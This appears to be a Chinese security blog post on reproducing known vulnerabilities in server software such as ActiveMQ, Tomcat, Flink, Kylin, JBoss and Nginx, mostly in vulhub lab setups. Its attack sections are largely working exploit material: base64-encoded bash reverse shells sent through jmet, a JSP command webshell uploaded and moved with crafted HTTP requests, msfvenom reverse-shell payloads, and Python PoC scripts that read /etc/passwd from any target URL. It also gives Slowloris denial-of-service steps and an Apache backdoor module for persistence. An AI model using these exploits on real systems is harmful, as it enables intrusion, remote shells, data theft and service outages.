<!doctype html><html lang=en dir=auto><head><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name=robots content="index, follow"><title>服务器应用漏洞 | Atmet</title><meta name=keywords content="漏洞复现"><meta name=description content="服务器应用漏洞 OpenSSL OpenSSL 心脏滴血漏洞 CVE-2014-0160 漏洞描述 2014年4月7日，OpenSSL发布安全公告，在OpenSSL 1.0.1 ~ 1.0.1f Beta1版本中存在漏洞，漏洞名为HeartBleed。其中Heart是指该漏洞位于心跳协议上，Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞，OpenSSL库中用到了该心跳协议。
影响版本 OpenSSL 1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等。
复现思路 漏洞复现 环境搭建:
git clone https://github.com/vulhub/vulhub.git cd vulhub/openssl/heartbleed docker-compose up -d 使用msf对目标进行攻击:
msfconsole set RHOST <ip> set verbose true run Web漏洞 Apache Airflow 存储型XSS 漏洞描述 Apache Airflow 1.10.2及之前版本中的airflow webserver服务存在跨站脚本漏洞，该漏洞源于WEB应用缺少对客户端数据的正确验证，使得攻击者可利用该漏洞执行客户端代码。
影响版本 Apache Airflow 1.10.3以下版本。
复现思路 漏洞复现 访问/admin/dagrun/(默认不需要密码)
创建一个项目，输入ID后点击保存，返回列表，点击running字样，发现能够输入HTML代码，例:
<script>_a=&#34;https://www.baidu.com&#34;</script> <script>document.location=_a</script> 能直接造成存储型XSS。
ActiveMQ 反序列化漏洞 CVE-2015-5254 漏洞描述 Apache ActiveMQ是Apache软件经济会研发的一套开源消息中间件，支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前版本，即5.x版本中存在反序列化漏洞，该漏洞源于程序没有限制可在代理中序列化的类，攻击者可借助特制的序列化Java消息服务(JMS) ObjectMessage对象利用该漏洞执行任意代码。
影响版本 Apache ActiveMQ 5."><meta name=author content="DaChui"><link rel=canonical href=https://oopsdc.tk/post/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/><link href=/assets/css/stylesheet.min.746a86b58bb2b052b5e4df8216510494f04f81e62c08d626150c26c69ca929da.css integrity="sha256-dGqGtYuysFK15N+CFlEElPBPgeYsCNYmFQwmxpypKdo=" rel="preload stylesheet" as=style><link rel=icon href=https://oopsdc.tk/%3Clink%20/%20abs%20url%3E><link rel=icon type=image/png sizes=16x16 href=https://oopsdc.tk/%3Clink%20/%20abs%20url%3E><link rel=icon type=image/png sizes=32x32 href=https://oopsdc.tk/%3Clink%20/%20abs%20url%3E><link rel=apple-touch-icon href=https://oopsdc.tk/%3Clink%20/%20abs%20url%3E><link rel=mask-icon href=https://oopsdc.tk/%3Clink%20/%20abs%20url%3E><meta name=theme-color content="#2e2e33"><meta name=msapplication-TileColor content="#2e2e33"><meta name=generator content="Hugo 0.83.1"><meta property="og:title" content="服务器应用漏洞"><meta property="og:description" content="服务器应用漏洞 OpenSSL OpenSSL 心脏滴血漏洞 CVE-2014-0160 漏洞描述 2014年4月7日，OpenSSL发布安全公告，在OpenSSL 1.0.1 ~ 1.0.1f Beta1版本中存在漏洞，漏洞名为HeartBleed。其中Heart是指该漏洞位于心跳协议上，Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞，OpenSSL库中用到了该心跳协议。
影响版本 OpenSSL 1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等。
复现思路 漏洞复现 环境搭建:
git clone https://github.com/vulhub/vulhub.git cd vulhub/openssl/heartbleed docker-compose up -d 使用msf对目标进行攻击:
msfconsole set RHOST <ip> set verbose true run Web漏洞 Apache Airflow 存储型XSS 漏洞描述 Apache Airflow 1.10.2及之前版本中的airflow webserver服务存在跨站脚本漏洞，该漏洞源于WEB应用缺少对客户端数据的正确验证，使得攻击者可利用该漏洞执行客户端代码。
影响版本 Apache Airflow 1.10.3以下版本。
复现思路 漏洞复现 访问/admin/dagrun/(默认不需要密码)
创建一个项目，输入ID后点击保存，返回列表，点击running字样，发现能够输入HTML代码，例:
<script>_a=&#34;https://www.baidu.com&#34;</script> <script>document.location=_a</script> 能直接造成存储型XSS。
ActiveMQ 反序列化漏洞 CVE-2015-5254 漏洞描述 Apache ActiveMQ是Apache软件经济会研发的一套开源消息中间件，支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前版本，即5.x版本中存在反序列化漏洞，该漏洞源于程序没有限制可在代理中序列化的类，攻击者可借助特制的序列化Java消息服务(JMS) ObjectMessage对象利用该漏洞执行任意代码。
影响版本 Apache ActiveMQ 5."><meta property="og:type" content="article"><meta property="og:url" content="https://oopsdc.tk/post/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"><meta property="og:image" content="https://oopsdc.tk/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"><meta property="article:section" content="post"><meta property="article:published_time" content="2021-06-17T09:03:30+08:00"><meta property="article:modified_time" content="2021-06-17T09:03:30+08:00"><meta property="og:site_name" content="Atmet"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://oopsdc.tk/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"><meta name=twitter:title content="服务器应用漏洞"><meta name=twitter:description content="服务器应用漏洞 OpenSSL OpenSSL 心脏滴血漏洞 CVE-2014-0160 漏洞描述 2014年4月7日，OpenSSL发布安全公告，在OpenSSL 1.0.1 ~ 1.0.1f Beta1版本中存在漏洞，漏洞名为HeartBleed。其中Heart是指该漏洞位于心跳协议上，Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞，OpenSSL库中用到了该心跳协议。
影响版本 OpenSSL 1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等。
复现思路 漏洞复现 环境搭建:
git clone https://github.com/vulhub/vulhub.git cd vulhub/openssl/heartbleed docker-compose up -d 使用msf对目标进行攻击:
msfconsole set RHOST <ip> set verbose true run Web漏洞 Apache Airflow 存储型XSS 漏洞描述 Apache Airflow 1.10.2及之前版本中的airflow webserver服务存在跨站脚本漏洞，该漏洞源于WEB应用缺少对客户端数据的正确验证，使得攻击者可利用该漏洞执行客户端代码。
影响版本 Apache Airflow 1.10.3以下版本。
复现思路 漏洞复现 访问/admin/dagrun/(默认不需要密码)
创建一个项目，输入ID后点击保存，返回列表，点击running字样，发现能够输入HTML代码，例:
<script>_a=&#34;https://www.baidu.com&#34;</script> <script>document.location=_a</script> 能直接造成存储型XSS。
ActiveMQ 反序列化漏洞 CVE-2015-5254 漏洞描述 Apache ActiveMQ是Apache软件经济会研发的一套开源消息中间件，支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前版本，即5.x版本中存在反序列化漏洞，该漏洞源于程序没有限制可在代理中序列化的类，攻击者可借助特制的序列化Java消息服务(JMS) ObjectMessage对象利用该漏洞执行任意代码。
影响版本 Apache ActiveMQ 5."><script type=application/ld+json>{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Posts","item":"https://oopsdc.tk/post/"},{"@type":"ListItem","position":2,"name":"服务器应用漏洞","item":"https://oopsdc.tk/post/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"}]}</script><script type=application/ld+json>{"@context":"https://schema.org","@type":"BlogPosting","headline":"服务器应用漏洞","name":"服务器应用漏洞","description":"服务器应用漏洞 OpenSSL OpenSSL 心脏滴血漏洞 CVE-2014-0160 漏洞描述 2014年4月7日，OpenSSL发布安全公告，在OpenSSL 1.0.1 ~ 1.0.1f Beta1版本中存在漏洞，漏洞名为HeartBleed。其中Heart是指该漏洞位于心跳协议上，Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞，OpenSSL库中用到了该心跳协议。\n影响版本 OpenSSL 1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等。\n复现思路 漏洞复现 环境搭建:\ngit clone https://github.com/vulhub/vulhub.git cd vulhub/openssl/heartbleed docker-compose up -d 使用msf对目标进行攻击:\nmsfconsole set RHOST \u0026lt;ip\u0026gt; set verbose true run Web漏洞 Apache Airflow 存储型XSS 漏洞描述 Apache Airflow 1.10.2及之前版本中的airflow webserver服务存在跨站脚本漏洞，该漏洞源于WEB应用缺少对客户端数据的正确验证，使得攻击者可利用该漏洞执行客户端代码。\n影响版本 Apache Airflow 1.10.3以下版本。\n复现思路 漏洞复现 访问/admin/dagrun/(默认不需要密码)\n创建一个项目，输入ID后点击保存，返回列表，点击running字样，发现能够输入HTML代码，例:\n\u0026lt;script\u0026gt;_a=\u0026#34;https://www.baidu.com\u0026#34;\u0026lt;/script\u0026gt; \u0026lt;script\u0026gt;document.location=_a\u0026lt;/script\u0026gt; 能直接造成存储型XSS。\nActiveMQ 反序列化漏洞 CVE-2015-5254 漏洞描述 Apache ActiveMQ是Apache软件经济会研发的一套开源消息中间件，支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前版本，即5.x版本中存在反序列化漏洞，该漏洞源于程序没有限制可在代理中序列化的类，攻击者可借助特制的序列化Java消息服务(JMS) ObjectMessage对象利用该漏洞执行任意代码。\n影响版本 Apache ActiveMQ 5.","keywords":["漏洞复现"],"articleBody":"服务器应用漏洞 OpenSSL OpenSSL 心脏滴血漏洞 CVE-2014-0160 漏洞描述 2014年4月7日，OpenSSL发布安全公告，在OpenSSL 1.0.1 ~ 1.0.1f Beta1版本中存在漏洞，漏洞名为HeartBleed。其中Heart是指该漏洞位于心跳协议上，Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞，OpenSSL库中用到了该心跳协议。\n影响版本 OpenSSL 1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等。\n复现思路 漏洞复现 环境搭建:\ngit clone https://github.com/vulhub/vulhub.git cd vulhub/openssl/heartbleed docker-compose up -d 使用msf对目标进行攻击:\nmsfconsole set RHOST  set verbose true run Web漏洞 Apache Airflow 存储型XSS 漏洞描述 Apache Airflow 1.10.2及之前版本中的airflow webserver服务存在跨站脚本漏洞，该漏洞源于WEB应用缺少对客户端数据的正确验证，使得攻击者可利用该漏洞执行客户端代码。\n影响版本 Apache Airflow 1.10.3以下版本。\n复现思路 漏洞复现 访问/admin/dagrun/(默认不需要密码)\n创建一个项目，输入ID后点击保存，返回列表，点击running字样，发现能够输入HTML代码，例:\nscript_a=\"https://www.baidu.com\"script scriptdocument.location=_ascript 能直接造成存储型XSS。\nActiveMQ 反序列化漏洞 CVE-2015-5254 漏洞描述 Apache ActiveMQ是Apache软件经济会研发的一套开源消息中间件，支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前版本，即5.x版本中存在反序列化漏洞，该漏洞源于程序没有限制可在代理中序列化的类，攻击者可借助特制的序列化Java消息服务(JMS) ObjectMessage对象利用该漏洞执行任意代码。\n影响版本 Apache ActiveMQ 5.13.0之前的5.x版本。\n复现思路 1.构造(可使用ysoserial)可执行命令的序列化对象。\n2.作为一个消息，发送给目标61616端口。\n3.访问web管理页面，读取消息，触发漏洞。\n漏洞复现 使用jmet进行漏洞利用:https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar\n 下载好之后在jmet-0.1.0-all.jar同级目录下创建external文件夹，避免出现文件夹不存在的报错。\njmet的原理是使用jar包内置ysoserial生成Payload并发送，我们需要在ysoserial的gadget选择一个可使用的，如ROME。\n 给目标ActiveMQ添加一个名为event的队列，点击事件为生成/tmp/vuln文件:\njava -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y \"touch /tmp/vuln\" -Yp ROME  61616 # 命令执行成功后回显如下 INFO d.c.j.t.JMSTarget [main] Connected with ID: ID: INFO d.c.j.t.JMSTarget [main] Sent gadget \"ROME\" with command: \"touch /tmp/vuln\" INFO d.c.j.t.JMSTarget [main] Shutting down connection ID: 访问http://:8161/admin/browse.jsp?JMSDestination=event查看消息队列，访问页面需要登录，默认账密如下:\nadmin/admin\r点击页面Message ID下的ID:server-id字段触发文件创建命令，在受害端查看命令是否执行成功:\nls /tmp 确认/tmp/vuln文件存在后即可进一步创建反弹shell。\nbash -i \u0026 /dev/tcp// 0\u00261 # Base64编码 YmFzaCAtaSA+JiAvZGV2L3RjcC88aXA+Lzxwb3J0PiAwPiYx bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC88aXA+Lzxwb3J0PiAwPiYx}|{base64,-d}|{bash,-i} # 发送payload java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y \"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC88aXA+Lzxwb3J0PiAwPiYx}|{base64,-d}|{bash,-i}\" -Yp ROME  61616 # INFO如下 INFO d.c.j.t.JMSTarget [main] Connected with ID: ID: INFO d.c.j.t.JMSTarget [main] Sent gadget \"ROME\" with command: \"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjExNi4yMzMuNzYvODg4MyAwPiYx}|{base64,-d}|{bash,-i}\" INFO d.c.j.t.JMSTarget [main] Shutting down connection ID: 执行成功后，在监听端打开nc:\nnc -lvvp  继续到http://:8161/admin/browse.jsp?JMSDestination=event页面，点击字段触发反弹shell，成功连接。\nActiveMQ 任意文件写入漏洞 CVE-2016-3088 漏洞描述 ActiveMQ中的FileServer服务允许用户通过PUT方法上传文件到指定目录。FileServer是存储文件的接口，支持写入文件(不解析jsp)，支持移动文件(Move)。\n影响版本 ActiveMQ 5.x ~ 5.14.0，但在5.12.x ~ 5.13.x版本中默认关闭fileserver应用(可在conf/jetty.xml中开启)。在5.14.0版本后彻底删除fileserver应用。\n复现思路 1.PUT一个webshell到fileserver目录\n2.若不能执行则移动webshell到有权限目录\n漏洞复现 访问http://:8161，先登录，默认账密:\nadmin/admin\r使用bp构造如下请求包:\nPUT /fileserver/a.jsp HTTP/1.1 Host: ip:8881 Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 If-Modified-Since: Fri, 13 Feb 2015 17:54:40 GMT Connection: close Content-Length: 349 %@ page import=\"java.io.*\"% % out.print(\"Hellobr\"); String strcmd=request.getParameter(\"cmd\"); String line=null; Process p=Runtime.getRuntime().exec(strcmd); BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream())); while((line=br.readLine())!=null){ out.print(line+\"br\"); } % 响应包如下:\nHTTP/1.1 204 No Content Connection: close Server: Jetty(8.1.16.v20140903) 查看webshell能否执行:http://:8161/fileserver/a.jsp，发现文件原样输出，没有被解析，当前目录没有执行权限。所以需要考虑移动文件至/webapps/api或/webapps/admin可解析jsp的目录下。\n要移动文件，必然就需要路径，以下为两种获取路径的方法:\n1.访问http://:8161admin/test/systemProperties.jsp\n2.构造错误上传路径，爆出绝对路径，如:\nPUT /fileserver/a/b HTTP/1.1 实测ActiveMQ 5.11.1版本无法利用。\n使用第一种方法，查看到文件路径为root/apache-activemq-5.11.1，下面把a.jsp文件移动到/webapps/admin目录下，构造包如下:\nMOVE /fileserver/a.jsp HTTP/1.1 Destination: file:///root/apache-activemq-5.11.1/webapps/admin/a.jsp Host: :8161 Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 If-Modified-Since: Fri, 13 Feb 2015 18:05:11 GMT Connection: close 响应包如下:\nHTTP/1.1 204 No Content Connection: close Server: Jetty(8.1.16.v20140903) 此时我们就可以使用webshell了:http://:8161/admin/a.jsp?cmd=ls。\nDDOS CVE-2007-6750 漏洞描述 Apache HTTP服务器2.2.15之前版本中缺少mod_ReqTimeout模块，1.x和2.x允许远程攻击者通过部分HTTP请求导致拒绝服务(守护进程中断)，如Slowloris。\n影响版本 Apache 1.x ~ 2.x\n复现思路 检查存活。\nmsf进一步验证。\n漏洞复现 首先使用nmap查看Apache版本:\nnmap -sV -p80  然后进一步访问网页，查看网页是否正常。\n使用msf执行攻击:\nmsfconsole # 启动metasploit\ruse auxiliary/dos/http/slowloris # 使用模块\rset RHOST  # 设置目标IP\rrun # 执行攻击\rHTTPd 换行解析漏洞 CVE-2017-15715 漏洞描述 Apache HTTPd是一款HTTP服务器，它可以通过mod_php来运行PHP网页。其2.4.0 ~ 2.4.29版本中存在一个解析漏洞，在解析PHP时，1.php\\x0A将被按照PHP后缀进行解析，导致绕过一些服务器的安全策略。\n影响版本 Apache HTTPd 2.4.0 ~ 2.4.29\n复现思路 抓包给文件后缀加上0a换行符。\n漏洞复现 环境搭建:\ngit clone https://github.com/vulhub/vulhub.git cd vulhub/httpd/CVE-2017-15715 docker-compose up -d 直接点击上传文件会被拦截，查看配置文件如下:\nSetHandler application/x-httpd-php\r\rDirectoryIndex disabled\rDirectoryIndex index.php index.html\rOptions -Indexes\rAllowOverride All\r\r前三行配置是将以.php为后缀的文件内容当作PHP代码进行解析，但使用了$进行文件匹配。\n$在正则表达式中是匹配字符串中结尾的位置，若存在换行符，则匹配换行符为结尾，可以通过这个缺陷绕过黑名单机制实现文件上传。\n抓包发送至Repeater模块，在文件后缀加上%0a绕过限制，上传成功，访问http://:/test.php%0a成功触发解析漏洞。\nFlink 目录遍历漏洞 CVE-2020-17519 漏洞描述 远程攻击者通过REST API目录遍历，可造成文件读取/写入的影响。\n影响版本 Apache Flink 1.11.0 ~ 1.11.2\n复现思路 漏洞复现 FOFA:app=\"Apache Flink\"\n环境搭建:vulhub/flink/CVE-2020-17519 at master · vulhub/vulhub (github.com)\nPOC:\nhttp:///jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd\r漏洞利用POC:\nimport requests import sys import json from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \\033[34mPOC_Des: http://wiki.peiqi.tech \\033[0m') print('+ \\033[34mGithub : https://github.com/PeiQi0 \\033[0m') print('+ \\033[34m公众号 : PeiQi文库 \\033[0m') print('+ \\033[34mVersion: Apache Flink 1.11.0-1.11.2 \\033[0m') print('+ \\033[36m使用格式: python3 CVE-2020-17519.py \\033[0m') print('+ \\033[36mUrl  http://xxx.xxx.xxx.xxx \\033[0m') print('+ \\033[36mFile  /etc/passwd \\033[0m') print('+------------------------------------------') def POC_1(target_url, file_name): file_name = file_name.replace(\"/\", \"%252f\") vuln_url = target_url + \"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..{}\".format(file_name) headers = { \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\", } try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(url=vuln_url, timeout=10, verify=False, headers=headers) print(\"\\033[32m[o] 请求URL ： {}\\033[0m\".format(vuln_url)) if \"root\" in response.text: print(\"\\033[32m[o] 目标 {} 存在漏洞,成功读取 /etc/passwd ，响应为:\\n{}\\033[0m\".format(target_url, response.text)) else : print(\"\\033[31m[x] 目标Url漏洞利用失败\\033[0m\") sys.exit(0) except Exception as e: print(\"\\033[31m[x] 目标Url漏洞利用失败\\033[0m\") sys.exit(0) def POC_2(target_url, file_name): file_name_re = file_name.replace(\"/\", \"%252f\") vuln_url = target_url + \"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..{}\".format(file_name_re) headers = { \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\", } try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(url=vuln_url, timeout=10, verify=False, headers=headers) print(\"\\033[32m[o] 请求URL ： {}\\033[0m\".format(vuln_url)) if \"error\" not in response.text: print(\"\\033[32m[o] 目标 {} 存在漏洞,成功读取 {} ，响应为:\\n{}\\033[0m\".format(target_url, file_name, response.text)) else : print(\"\\033[31m[x] 目标文件{}读取失败\\033[0m\".format(file_name)) except Exception as e: print(\"\\033[31m[x] 目标Url漏洞利用失败\\033[0m\") sys.exit(0) if __name__ == '__main__': title() target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl  \\033[0m\")) file_name = \"/etc/passwd\" POC_1(target_url, file_name) while True: file_name = input(\"\\033[35mFile  \\033[0m\") if file_name == \"exit\": sys.exit(0) else: POC_2(target_url, file_name) 使用方式:python3 poc.py\nUrl ::\nFile :/etc/hosts\n后门维持 漏洞描述 通过第三方脚本实现维持后门。\n影响版本 复现思路 上传文件\n重启服务\n执行脚本\n漏洞复现 工具下载:ianxtianxt/apache-: apache权限维持后门 (github.com)\n1.上传mod_backdoor.c到服务器，并执行命令\napxs -i -a -c mod_backdoor.c \u0026\u0026 service apache2 restart 2.控制端执行脚本\npython exploit.py  80 Mod_jk 访问控制权限绕过 CVE-2018-11759 漏洞描述 Apache Tomcat JK(mod_jk) Connector是美国阿帕奇(Apache)软件基金会的一款为Apache或IIS提供连接后台Tomcat的模块，为Apache或IIS服务器提供处理JSP/Servlet的能力。\n由于httpd和Tomcat在路径处理规范上存在差异，httpd将url中的分号视作路径解析中的普通字符，而Tomcat将其当作查询分隔符(类似\"?\")。如，攻击者获取到路径:http://server/java_app/.. ;，对httpd来说，这并不会触发服务器并跳转到相应目录，仅仅被原封不动转发到Tomcat，且地址尾部被解析为.. *。这就允许攻击者获取到本不能在Tomcat访问的资源。\njkstatus是mod_jk模块的管理界面，设为读写权限时，允许配置AJP连接Java Web服务器代理HTTP请求，我们可以绕过Apache mod_jk Connector由JkMount httpd指令所定义端点的访问控制限制。如果能访问一个只有只读权限的jkstatus的接口，那么就有可能能够公开由mod_jk模块给AJP提供服务的内部路由。 如果能访问一个具有读写权限的jkstatus接口，我们就能通过修改AJP的配置文件中相关配置来劫持或者截断所有经过mod_jk的流量，或者进行内部端口扫描。\n影响版本 Apache Mod_jk Connector 1.2.0 ~ 1.2.44\n复现思路 漏洞复现 环境搭建:\ngit clone https://github.com/immunIT/CVE-2018-11759.git docker-compose up -d 访问http://:80成功后，访问http://:80/jkstatus，显示无权限，通常使用如下httpd指令限制对jkstatus的访问:\nJKMount jk-status\rRequire ip 127.0.0.1\r\r在URL后加一个分号即可绕过限制，http://:80/jkstatus;。\n我们还可在分号之后提交GET参数，向jkstatus请求修改其访问权限的配置，如:http://:80/jkstatus;?cmd=dump。\n参数若能被解析，其产生的影响就等同于更改工作人员使用的端口来实现对所有由mod_jk供应的应用程序拒绝服务的效果，此外，若攻击者将相应AJP连接到自己的服务器上，就可能劫持所有到由mod_jk供应服务的Web应用的流量。\n从理论上说，将AJP的目标和端口修改为内部主机及其对应端口后，由于httpd和Tomcat的jkstatus返回错误信息不一致，我们能进行内部TCP端口扫描，具体情况取决于提交的AJP端口是否有效。\nKylin Console 控制台弱口令 漏洞描述 默认弱口令admin/KYLIN。\n影响版本 Apache Kylin\n复现思路 漏洞复现 打开站点输入默认账密。\nKylin 未授权配置泄露 CVE-2020-13937 漏洞描述 Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息。\n影响版本 Apahche Kylin 2.x.x\nApahche Kylin Apahche Kylin 4.0.0-alpha\n复现思路 漏洞复现 POC:http:///kylin/api/admin/config\n漏洞检测POC:\nimport requests def title(): print('+------------------------------------------') print('+ \\033[34mPOC_Des: http://wiki.peiqi.tech \\033[0m') print('+ \\033[34mGithub : https://github.com/PeiQi0 \\033[0m') print('+ \\033[34m公众号 : PeiQi文库 \\033[0m') print('+ \\033[34mVersion: Apache Kylin 2.x.x \\033[0m') print('+ \\033[36m使用格式: python3 cve-2019-13937.py \\033[0m') print('+ \\033[36mUrl  http://xxx.xxx.xxx.xxx:9999 \\033[0m') print('+------------------------------------------') def POC_1(target_url): vuln_url = target_url + \"/kylin/api/admin/config\" headers = { \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\" } try: response = requests.get(url=vuln_url, headers=headers, timeout=20) if \"config\" in response.text: print(\"\\033[32m[o] 存在Apache Kylin的未授权配置泄露\\n[o] 响应为:\\n\\033[0m\",response.text) else: print(\"\\033[31m[x] 目标Url漏洞利用失败\\033[0m\") except: print(\"\\033[31m[x] 目标Url漏洞利用失败\\033[0m\") if __name__ == '__main__': title() target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl  \\033[0m\")) POC_1(target_url) RCE CVE-2017-12615 漏洞描述 conf/web.xml文件配置错误中的readonly参数默认为false，攻击者可以使用PUT/DELETE请求方法操作文件。如通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP文件，JSP文件中的恶意代码将能被服务器执行，导致服务器数据泄露或获取服务器权限。\n影响版本 Apache Tomcat 7.0.0 ~ 7.0.81\n复现思路 msf生成jsp马\nPUT上传文件\n漏洞复现 环境搭建:\ngitclone https://github.com/vulhub/vulhub.git cd vulhub/tomcat/CVE-2017-12615 docker-compose up -d msf生成jsp马:\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw  shell.jsp PUT上传jsp马:\ncurl -v -X PUT --data-binary @shell.jsp \"http://:8080/shell.jsp/\" Zookeeper 未授权访问漏洞 CVE-2014-085 漏洞描述 默认安装配置好的Zookeeper允许未授权访问，管理员未配置访问控制列表(ACL)，导致攻击者可以在默认开放的2181端口下通过执行envi命令获得大量敏感信息(系统名称、java环境)导致任意用户可以在网络不受限的情况下进行未授权访问读取数据。\n影响版本 Apache Zookeeper\n复现思路 漏洞复现 Zookeeper默认开放2181端口，使用如下命令获取敏感信息:\necho envi | nc xxx.xxx.xxx.xxx 2181\r1、stat:列出关于性能和连接的客户端的统计信息。\recho stat |ncat  2181\r2、ruok:测试服务器是否运行在非错误状态。\recho ruok |ncat  2181\r3、reqs:列出未完成的请求。\recho reqs |ncat  2181\r4、envi:打印有关服务环境的详细信息。\recho envi |ncat  2181\r5、dump:列出未完成的会话和临时节点。\recho dump |ncat  2181\rJBoss JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504 漏洞描述 Red Hat JBoss Application Server是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中，JBossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞，攻击者可借助特制的序列化数据利用该漏洞执行任意代码。\n影响版本 JBoss AS 4.x及之前。\n复现思路 漏洞复现 环境搭建:\ngit clone https://github.com/vulhub/vulhub.git cd vulhub/jboss/CVE-2017-7504 docker-compose up -d Jexboss工具:joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool (github.com)\ngit clone https://github.com/joaomatosf/jexboss.git python3 jexboss.py -host http://:8080 成功利用漏洞执行命令。\nNginx Nginx 越界读取缓存漏洞 CVE-2017-7529 漏洞描述 Nginx在反向代理站点的时候，通常会缓存一些文件，特别是静态文件。缓存的部分存储在文件中，每个缓存文件包括文件头+HTTP返回包头+HTTP返回包体。如果二次请求命中该缓存文件，Nginx会直接将该文件中的HTTP返回包体返回给用户。\n如果我的请求中包含Range头，Nginx将会根据我指定的start和end位置，返回指定长度的内容。而如果我构造了两个负的位置，如(-600, -9223372036854774591)，将可能读取到负位置的数据。如果这次请求又命中了缓存文件，则可能读取到缓存文件中位于HTTP返回包体前的文件头、HTTP返回包头等内容。\n影响版本 Nginx 0.5.6 ~ 1.13.2\n复现思路 漏洞复现 环境搭建:\ngit clone https://github.com/vulhub/vulhub.git cd vulhub/nginx/CVE-2017-7529 docker-compose up -d 访问:http://:8080正常即可。\nPOC已经在当前目录中给出来，文件名poc.py:\n#!/usr/bin/env python import sys import requests if len(sys.argv)  2: print(\"%surl\" % (sys.argv[0])) print(\"eg: python %shttp://your-ip:8080/\" % (sys.argv[0])) sys.exit() headers = { 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\" } offset = 605 url = sys.argv[1] file_len = len(requests.get(url, headers=headers).content) n = file_len + offset headers['Range'] = \"bytes=-%d,-%d\" % ( n, 0x8000000000000000 - n) r = requests.get(url, headers=headers) 使用POC进行验证:\npython3 poc.py http://ip:8080/ # 获取到的文件头及返回包头 